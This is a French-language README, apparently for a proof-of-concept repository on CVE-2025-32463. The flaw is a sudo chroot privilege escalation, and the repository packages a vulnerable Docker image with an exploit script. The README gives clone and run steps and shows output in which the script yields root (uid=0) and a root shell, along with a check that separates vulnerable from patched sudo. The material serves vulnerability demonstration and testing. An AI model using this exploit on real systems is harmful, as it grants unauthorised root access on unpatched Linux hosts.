
Élévation de privilèges à la racine via le binaire sudo avec l'option chroot. CVE-2025-32463
Ce dépôt fournit un environnement minimal et reproductible pour démontrer la faille d’élévation de privilèges CVE‑2025‑32463 dans la fonctionnalité chroot de sudo.
Les versions vulnérables de sudo 1.9.14 jusqu’à 1.9.17 (toutes les révisions p) sont concernées sur la plupart des distributions Linux.
Pages de sécurité
| Fichier | Description |
|---|---|
| Dockerfile | Construit une image Ubuntu 24.04 contenant sudo 1.9.16p2 vulnérable et les outils de compilation |
| sudo‑chwoot.sh | Exploit de preuve de concept qui ouvre un shell root dans le chroot |
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
run.sh transmet --privileged et --rm à Docker afin que le conteneur se nettoie tout seul lorsque vous le quittez.
Supprimez l’image lorsque vous avez terminé :
docker rmi sudo-chwoot
| run.sh |
| Script d’assistance qui construit l’image (si nécessaire) et lance le conteneur de l’exploit |